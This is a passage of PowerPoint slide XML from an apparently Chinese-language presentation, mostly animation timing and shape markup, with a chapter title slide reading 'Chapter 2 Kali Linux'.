                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
